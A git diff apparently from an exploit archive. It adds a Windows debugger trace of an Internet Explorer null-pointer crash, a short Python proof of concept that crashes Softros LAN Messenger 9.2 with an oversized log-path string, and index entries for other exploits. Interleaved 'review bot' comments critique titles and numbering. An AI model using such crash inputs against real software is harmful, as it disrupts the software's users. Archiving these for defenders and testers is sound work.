ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000000 + Parameter[1]: 00000418 +Attempt to read from address 00000418 +1:022:x86> ub +MSHTML!Tree::Notify_InvalidateDisplay+0x7: +555ae802 f7460800001000 test dword ptr [esi+8],100000h +555ae809 756e jne MSHTML!Tree::Notify_InvalidateDisplay+0x7e (555ae879) +555ae80b 8bc6 mov eax,esi +555ae80d 8b38 mov edi,dword ptr [eax] +555ae80f 85ff test edi,edi +555ae811 7462 je MSHTML!Tree::Notify_InvalidateDisplay+0x7a (555ae875) +555ae813 8bcf mov ecx,edi +555ae815 e8b664d5ff call MSHTML!CElement::GetMarkupPtr (55304cd0) +1:022:x86> 
+MSHTML!TSmartPointer::operator&+0x12:
+555ae7f3 50 push eax
+555ae7f4 e8a7f9c6ff call MSHTML!CFilterNativeInfo::Release (5521e1a0)
+555ae7f9 ebf4 jmp MSHTML!TSmartPointer::operator&+0xe (555ae7ef)
+MSHTML!Tree::Notify_InvalidateDisplay:
+555ae7fb 8bff mov edi,edi
+555ae7fd 53 push ebx
+555ae7fe 56 push esi
+555ae7ff 8bf1 mov esi,ecx
+555ae801 57 push edi
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45781.py b/exploits/windows_x86-64/dos/45781.py
new file mode 100755
index 000000000..d78d8f52b
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45781.py
@@ -0,0 +1,23 @@
+# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC)
+# Discovery by: Victor Mondragón
+# Discovery Date: 2018-11-02
+# Vendor Homepage: https://messenger.softros.com/
+# Software Link: https://messenger.softros.com/downloads/
+# Tested Version: 9.2
+# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
+
+# Steps to produce the crash:
+# 1.- Run python code: Softros_LAN_Messenger_v9.2.py
+# 2.- Open msn.txt and copy content to clipboard
+# 2.- Open Softros LAN Messenger
+# 3.- Select "Logging"
+# 4.- Locate "Log Files Location "
+# 5.- Select "Custom Location" and Paste ClipBoard
+# 6.- Click on "OK"
+# 7.- Crashed
+
+cod = "\x41" * 2000
+
+f = open('msn.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5bc4341c9..1e7a69b9e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
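Review bot: The first line of the advisory reads `Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference`, while the files_exploits.csv entry added in the same commit describes 45778 as `Null Pointer Dereference`, and the WinDbg bucket quoted further down is `NULL_CLASS_PTR_READ`; the header should read `# Exploit Title: Microsoft Internet Explorer 11 - Null Pointer Dereference` so the file agrees with the index and with its own trace. The `Affected version` block lists four IE builds but the `Tested on` lines name only two Windows releases, so it is not clear which build was reproduced on which OS; a one-line mapping would help anyone triaging the three traces that follow.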
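Review bot: Step 1 of the reproduction steps points at `Softros_LAN_Messenger_v9.2.py`, but the file added by this commit is `exploits/windows_x86-64/dos/45781.py`, so the instructions name a script the reader does not have; presumably the submission was renamed on import, and the line should read `# 1.- Run python code: 45781.py` or simply refer to "this script". Two steps are numbered `2.-`, so the list runs 1, 2, 2, 3 … 7 and should be renumbered. The file write would read better as a context manager, `with open('msn.txt', 'w') as f:` followed by `    f.write(cod)`, which also closes the file if the write raises instead of relying on the explicit `f.close()`.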
@@ -6175,6 +6175,7 @@ id,file,description,date,author,type,platform,port
 45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
 45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
 45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
+45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10077,6 +10078,9 @@ id,file,description,date,author,type,platform,port
 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
 45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
+45778,exploits/windows/local/45778.txt,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,local,windows,
+45782,exploits/macos/local/45782.c,"LiquidVPN 1.36 / 1.37 - Privilege Escalation",2018-11-05,"Bernd Leitner",local,macos,
+45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40281,3 +40285,12 @@ id,file,description,date,author,type,platform,port
 45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
 45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80
 45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
+45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
+45774,exploits/asp/webapps/45774.py,"Advantech WebAccess SCADA 8.3.2 - Remote Code Execution",2018-11-05,"Chris Lyne",webapps,asp,
+45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
+45776,exploits/hardware/webapps/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",webapps,hardware,
+45777,exploits/php/webapps/45777.txt,"Poppy Web Interface Generator 0.8 - Arbitrary File Upload",2018-11-05,"Ihsan Sencan",webapps,php,
+45779,exploits/php/webapps/45779.txt,"Mongo Web Admin 6.0 - Information Disclosure",2018-11-05,"Ihsan Sencan",webapps,php,
+45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php,
+45783,exploits/json/webapps/45783.html,"Royal TS/X - Information Disclosure",2018-11-05,"Jakub Palaczynski",webapps,json,54890
+45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,
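Review bot: The description for 45780 reads `PHP Proxy 3.0.3 - Local File Inclusion`, but the title line of the added exploits/php/webapps/45780.py is `PHP-Proxy 3.0.3 - Local File Inclusion` (hyphenated, as the vendor name is written throughout that file); the index entry should use the same spelling so a search on either the file or the index finds both. The 45784 entry has an empty port field even though the added 45784.txt shows a plain `POST /[PATH]/? HTTP/1.1` against `Host: TARGET`, so `80` would be consistent with the neighbouring 45773 and 45775 SQL-injection entries in this same hunk; if the omission is deliberate, a consistent rule for when `webapps,php` rows carry a port would help.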